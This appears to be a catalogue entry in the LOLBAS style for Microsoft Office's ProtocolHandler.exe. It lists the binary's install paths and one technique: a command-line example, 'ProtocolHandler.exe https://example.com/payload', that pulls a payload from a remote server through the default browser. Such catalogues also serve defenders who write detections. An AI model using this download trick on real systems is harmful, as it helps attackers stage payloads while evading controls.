Protocolhandler

.. /ProtocolHandler.exe

Star

Microsoft Office binary

Paths:

C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\ProtocolHandler.exe
C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\ProtocolHandler.exe
C:\Program Files (x86)\Microsoft Office\Office16\ProtocolHandler.exe
C:\Program Files\Microsoft Office\Office16\ProtocolHandler.exe
C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\ProtocolHandler.exe
C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\ProtocolHandler.exe
C:\Program Files (x86)\Microsoft Office\Office15\ProtocolHandler.exe
C:\Program Files\Microsoft Office\Office15\ProtocolHandler.exe

Acknowledgements:

Download

Downloads payload from remote server

ProtocolHandler.exe https://example.com/payload

Use case: It will open the specified URL in the default web browser, which (if the URL points to a file) will often result in the file being downloaded to the user's Downloads folder (without user interaction)